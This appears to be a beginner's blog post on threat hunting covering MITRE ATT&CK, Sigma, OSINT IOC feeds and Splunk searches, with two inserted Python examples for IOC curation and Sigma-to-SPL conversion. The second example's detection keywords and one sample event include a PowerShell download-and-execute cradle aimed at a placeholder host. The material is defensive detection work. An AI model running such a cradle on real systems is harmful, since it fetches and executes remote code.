The purpose of this blog post is to introduce new analysts to threat hunting activities, terms, tools, and the field of threat hunting. It is not a comprehensive compendium of how to threat hunt, but more of a nudge in the right direction for rookie analysts based on my experiences.
What Is Threat Hunting
Threat hunting is the proactive, analyst-driven process of searching for attacker tactics, techniques, and procedures (TTPs) within a network environment. It is usually done by teams of experts who track adversary TTPs and research them to understand what to search for in the log sources gathered by SIEMs or network analysis tools.
Information about attacker TTPs most often originates in the form of indicators of compromise observed from threat intelligence sources such as vendor threat feeds, virus repositories, three-letter agency disclosures, and social media posts.
Threat hunting isn't just for DFIR experts or seasoned analysts. It can be conducted as an ad-hoc investigation started from some piece of evidence. However, analysts should be trained to determine the security baseline of their environment before conducting any threat hunts, so that normal activity does not get flagged as suspicious.
Threat Hunting Training
There are several avenues for pursuing training in threat hunting. Keep in mind, however, that threat hunting is meant for experts who can identify sophisticated attacks and develop detection mechanisms, which requires a deep understanding of many technologies and how they interact with each other.
Below are some courses for training in threat hunting:
- Cybrary – Intro to Threat Hunting
- Active Countermeasures Threat Hunting Course (free)
- SANS Incident Response and Threat Hunting
- FireEye Cyber Threat Hunting
Another great way to delve into threat hunting is to look through the SANS Cyber Security Summit archives for presentations about threat hunting. In this industry there is no single common body of knowledge; the information gathered over the years by individuals is spread across various blogs and slide decks from security conferences.
Threat Hunting Activities
Rather than rely on alerts from the SIEM to kick off an investigation, analysts should be proactively engaging in threat hunting investigations to uncover suspicious or malicious activity.
This blog post will go over four main activities that any Tier 1 SOC analyst can do to threat hunt:
- Researching the TTPs: MITRE & Sigma
- Curating Threat Lists from Open Source Threat Intelligence Feeds
- Subscribing to news, vendors, & social media for adversary information
- Crafting precision searches on the SIEM
The next several sections will detail the process for each of these.
1. Researching the TTPs: MITRE & Sigma
Analysts can begin their threat hunts by researching the various TTPs of attacks. There are two great resources for tackling the vast number of tactics and techniques: MITRE ATT&CK and Sigma.
The MITRE ATT&CK framework is a knowledge base of adversary behavior and a common language for sharing intelligence based on a standard model. The matrix can be used to organize and formulate proactive investigations by emulating the adversary techniques most likely to be used against your network environment.
The adversary tactics are listed across the top of the matrix, and each column lists all the known techniques for accomplishing that tactic. A technique can belong to more than one tactic. Analysts routinely use the matrix to craft precision searches, come up with SIEM use cases to trigger alarms, and start proactive investigations using the various tools at their disposal.
Clicking on any of the techniques brings you to a closer look, with a detailed description, dependencies, examples of usage by APT groups, and recommendations for detection and mitigation.
The Sigma GitHub project, maintained by Florian Roth, is a generic and open signature format that allows you to describe relevant log events in a straightforward manner. The rule format is very flexible, easy to write, and applicable to any type of log file. The main purpose of the project is to provide a structured form in which researchers or analysts can describe the detection methods they have developed and share them with others.
Analysts can go through these Sigma rules by category and use the indicators they describe to create alerts or to search their environment for the activity.
2. Curating Threat Lists from Open Source Threat Intelligence Feeds
Threat lists with fresh IOCs can be compiled from various open source intelligence feeds, malware repositories, and malware researchers on social media, and then fed into SIEM alerts.
Below are some examples of open source threat intelligence feeds:
- Abuse CH
- Cryptolaemus Daily Emotet IOCs
- VirusTotal Community Threat intelligence
- AlienVault Threat Intelligence Feeds
- Twitter (Hashtags: #emotet, #ryuk, #trickbot, #opendir, etc.)
Analysts can make it a routine to proactively scour these sources to harvest, update, and improve the threat lists that drive IOC-based SIEM alarms. Over time, analysts who do this learn who provides actionable threat intelligence, especially on Twitter, where certain users consistently give excellent information.
You can read more about this in my blog post, Scraping IOCs from the Internet.
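The curation step described above, as an added example that is not the author's scraper: it merges three constructed feeds (a plain-text IP list, a CSV export, and a defanged social-media post), refangs and lower-cases each value, classifies it as an IP, SHA-256 or domain, drops anything unrecognised, ages out dated indicators older than 30 days, deduplicates across feeds while remembering which sources reported each IOC, and renders the result as a CSV lookup table. All feed contents and the reference date are constructed; none of the values are real indicators.

```python
"""Curate a deduplicated, SIEM-ready threat list from several OSINT feeds.

Added example for this post (not the author's own tooling). The feeds are
constructed samples; nothing is fetched from the network.
"""
import csv
import io
import ipaddress
import re
from datetime import date
from urllib.parse import urlparse

FEED_PLAIN = """# constructed plain-text feed: one IP per line, '#' comments
198.51.100.23
203.0.113.7
198.51.100.23
"""
FEED_CSV = """first_seen,ioc_type,ioc
2020-07-20,sha256,0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
2020-07-01,domain,BAD-example.test
2020-06-01,ip,203.0.113.7
"""
# Constructed post in the style of a researcher's tweet (defanged values).
POST = "#emotet new c2 hxxp://bad-example[.]test/wp-content/upload.php and 192[.]0[.]2[.]44"

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
DOMAIN_RE = re.compile(r"^([a-z0-9-]+\.)+[a-z]{2,}$")

def refang(text):
    """Undo common defanging so the value matches what the SIEM actually logs."""
    return text.replace("hxxp", "http").replace("[.]", ".").replace("(.)", ".")

def classify(value):
    """Return 'ip', 'sha256' or 'domain' for a normalised value, else None."""
    try:
        ipaddress.ip_address(value)
        return "ip"
    except ValueError:
        pass
    if SHA256_RE.match(value):
        return "sha256"
    if DOMAIN_RE.match(value):
        return "domain"
    return None

def parse_plain(text, source):
    """Yield (raw_value, first_seen, source); this feed carries no dates."""
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            yield line, None, source

def parse_csv(text, source):
    for row in csv.DictReader(io.StringIO(text)):
        yield row["ioc"], date.fromisoformat(row["first_seen"]), source

def parse_post(text, source, seen_on):
    """Pull candidate IOCs out of free text; URLs are reduced to their host."""
    for token in text.split():
        token = refang(token).strip(".,;")
        if token.startswith(("http://", "https://")):
            token = urlparse(token).hostname or ""
        yield token, seen_on, source

def curate(records, today, max_age_days=30):
    """Normalise, classify, dedupe and age out IOCs.

    Returns {(type, value): {"first_seen": date or None, "sources": set}}.
    Undated entries are kept (the feed is assumed current); dated entries older
    than max_age_days are dropped so stale IOCs do not keep alarms noisy.
    """
    entries = {}
    for raw, first_seen, source in records:
        value = refang(raw).strip().lower()
        kind = classify(value)
        if kind is None:
            continue  # hashtags, prose and malformed values never reach the SIEM
        if first_seen is not None and (today - first_seen).days > max_age_days:
            continue
        info = entries.setdefault((kind, value), {"first_seen": first_seen, "sources": set()})
        info["sources"].add(source)
        if first_seen and (info["first_seen"] is None or first_seen < info["first_seen"]):
            info["first_seen"] = first_seen
    return entries

def to_lookup_csv(entries):
    """Render the list as a CSV lookup table (one row per IOC, sorted)."""
    out = io.StringIO()
    writer = csv.writer(out)
    writer.writerow(["ioc", "ioc_type", "first_seen", "sources"])
    for (kind, value), info in sorted(entries.items()):
        seen = info["first_seen"].isoformat() if info["first_seen"] else ""
        writer.writerow([value, kind, seen, ";".join(sorted(info["sources"]))])
    return out.getvalue()

def build_threat_list(today=date(2020, 7, 27)):
    """Merge the constructed feeds; 'today' is fixed so the result is reproducible."""
    records = [*parse_plain(FEED_PLAIN, "plain"),
               *parse_csv(FEED_CSV, "csv"),
               *parse_post(POST, "twitter", today)]
    return curate(records, today)

if __name__ == "__main__":
    print(to_lookup_csv(build_threat_list()))
```

Running it yields five rows: the duplicate IP from the plain feed collapses to one, the domain is reported by both the CSV and the post (keeping the earlier first-seen date), and the June entry for 203.0.113.7 is dropped as stale while the undated copy from the live feed survives. The CSV can be uploaded to Splunk as a lookup table and matched against event fields with the `lookup` command; the same source attribution lets you judge later which feeds actually produced true positives.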
3. Subscribing to news, vendors, & social media for adversary information
Another way to stay on top of threats and to proactively threat hunt is to subscribe to news sites, vendor notifications, or social media.
News sites, such as BleepingComputer, can be used to keep on top of the most recent threats and to determine whether a threat is worth devoting more time to.
Vendors usually have some sort of subscription-based service where, if you are a client, you can configure email alerts for things such as patch releases, IPS signature updates, vulnerability disclosures, and other important information.
Lastly, Twitter is one of the best sources of threat intelligence and news, because the community is always looking to share the next critical vulnerability with a CVSS score of 10.
All of these can be used in some way to form the basis of your investigation or threat hunt, either by identifying some IOC (a string in a URL, an IP address, a hash value, etc.) or by learning about the newest attack tactic.
4. Crafting precision searches on the SIEM
For the purposes of this blog post, I will focus on the SIEM Splunk.
Precision searches can be created to identify specific activity occurring in an environment via a SIEM. Splunk lets you build precision searches using the Search Processing Language (SPL), which provides over 140 commands that allow you to search, correlate, analyze, and visualize any data. More information on SPL can be found here.
Threat hunting with precision searches can leverage MITRE ATT&CK and Sigma to build queries that search for indicators of compromise.
For example, one of the techniques you may be looking for in your environment may be covered by the Sigma rule Suspicious PowerShell Invocations, which looks for keywords such as:
If we took one of those keywords and fed it into a Splunk search, it would look like the following:
Splunk Search for PowerShell IEX Commands
index=* sourcetype="WinEventLog:Security" Process_Command_Line=*
| eval Process_Command_Line=lower(Process_Command_Line)
| search Process_Command_Line=*iex*new-object*
| stats VALUES(Process_Command_Line) BY host
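To show how a Sigma rule turns into a search like the one above, and how the same logic can be checked before it goes into the SIEM, here is an added example that is not from the Sigma project or this post's author. The rule is a constructed, shortened one written in the layout of a Sigma detection (the real Suspicious PowerShell Invocations rule is not reproduced; only the IEX / New-Object pairing from the search above is taken from the page), the field mapping from Sigma's `CommandLine` to Splunk's `Process_Command_Line` is an assumption for this sourcetype, and the four 4688-style events are constructed records. The code compiles the rule to SPL with the same `eval lower()` and `stats ... by host` shape as the search on the page, and evaluates the rule locally against the sample events.

```python
"""Compile a Sigma-style keyword rule to SPL and test it against sample events.

Added example for this post. RULE is constructed in Sigma's shape (as it would
look after loading the YAML); EVENTS are constructed, not captured logs.
"""
import re

# Constructed rule. 'contains|all' means every listed substring must appear,
# in any order, case-insensitively; '1 of selection_*' ORs the selections.
RULE = {
    "title": "Suspicious PowerShell Invocation (constructed example)",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection_download": {"CommandLine|contains|all": ["IEX", "New-Object"]},
        "selection_hidden": {"CommandLine|contains|all": ["-nop", "-w hidden", "-enc"]},
        "condition": "1 of selection_*",
    },
}

# Assumed mapping from the Sigma field name to the field in the page's sourcetype.
FIELD_MAP = {"CommandLine": "Process_Command_Line"}

# Constructed 4688-style records: two benign, two that the rule should catch.
EVENTS = [
    {"host": "ws01", "Process_Command_Line": 'powershell.exe -Command "Get-ChildItem C:\\Users"'},
    {"host": "ws02", "Process_Command_Line": "powershell -nop -w hidden -enc QUFBQQ=="},
    {"host": "ws03", "Process_Command_Line": "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
    {"host": "ws04", "Process_Command_Line": "powershell -Command \"New-Object System.IO.StreamReader('C:\\log.txt')\""},
]

def _parse_field(key):
    """Split 'CommandLine|contains|all' into ('CommandLine', ['contains', 'all'])."""
    field, *mods = key.split("|")
    return field, mods

def _selected(detection):
    """Names of the selections referenced by a '1 of <prefix>*' condition."""
    m = re.fullmatch(r"1 of (\w+)\*", detection["condition"])
    if not m:
        raise ValueError("unsupported condition: " + detection["condition"])
    return [n for n in detection if n != "condition" and n.startswith(m.group(1))]

def selection_matches(selection, event):
    """True if every field in the selection matches the event (Sigma AND semantics)."""
    for key, needles in selection.items():
        field, mods = _parse_field(key)
        value = str(event.get(FIELD_MAP.get(field, field), "")).lower()
        needles = [needles] if isinstance(needles, str) else needles
        if "contains" in mods:
            hits = [n.lower() in value for n in needles]
        else:
            hits = [n.lower() == value for n in needles]
        if not (all(hits) if "all" in mods else any(hits)):
            return False
    return True

def rule_matches(rule, event):
    return any(selection_matches(rule["detection"][n], event)
               for n in _selected(rule["detection"]))

def _spl_literal(text):
    return '"' + text.replace("\\", "\\\\").replace('"', '\\"') + '"'

def selection_to_spl(selection):
    """One selection becomes a parenthesised group of field comparisons."""
    clauses = []
    for key, needles in selection.items():
        field, mods = _parse_field(key)
        spl_field = FIELD_MAP.get(field, field)
        needles = [needles] if isinstance(needles, str) else needles
        wrap = (lambda n: "*" + n + "*") if "contains" in mods else (lambda n: n)
        terms = [f"{spl_field}={_spl_literal(wrap(n.lower()))}" for n in needles]
        clauses.append("(" + (" AND " if "all" in mods else " OR ").join(terms) + ")")
    return " AND ".join(clauses)

def rule_to_spl(rule, index="*", sourcetype="WinEventLog:Security"):
    """Same pipeline shape as the page's search: lower-case, filter, summarise by host."""
    det = rule["detection"]
    names = _selected(det)
    fields = sorted({FIELD_MAP.get(_parse_field(k)[0], _parse_field(k)[0])
                     for n in names for k in det[n]})
    lowered = ", ".join(f"{f}=lower({f})" for f in fields)
    where = " OR ".join(selection_to_spl(det[n]) for n in names)
    return (f'index={index} sourcetype="{sourcetype}" Process_Command_Line=* '
            f"| eval {lowered} | search {where} "
            f"| stats values(Process_Command_Line) by host")

def run_rule(rule=RULE, events=EVENTS):
    """Hosts with at least one matching event, like the '| stats ... by host' step."""
    return sorted({e["host"] for e in events if rule_matches(rule, e)})

if __name__ == "__main__":
    print(rule_to_spl(RULE))
    print("hosts to triage:", run_rule())
```

Two design points are worth noting. The compiled search uses one `field="*term*"` comparison per keyword joined with `AND`, rather than a single `*iex*new-object*` pattern, because Sigma's `contains|all` does not care about the order the terms appear in, whereas the page's single wildcard pattern only matches when IEX precedes New-Object. And the benign `New-Object System.IO.StreamReader` event on ws04 is kept in the sample set on purpose: it shows why the rule requires both terms, since alerting on `New-Object` alone would page you for ordinary administration scripts.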
These are some of the things you can do as a Tier 1 analyst to start your journey into threat hunting. Should you come across an actual threat, I recommend escalating to a senior analyst.
Last Updated for Accuracy: July 27, 2020.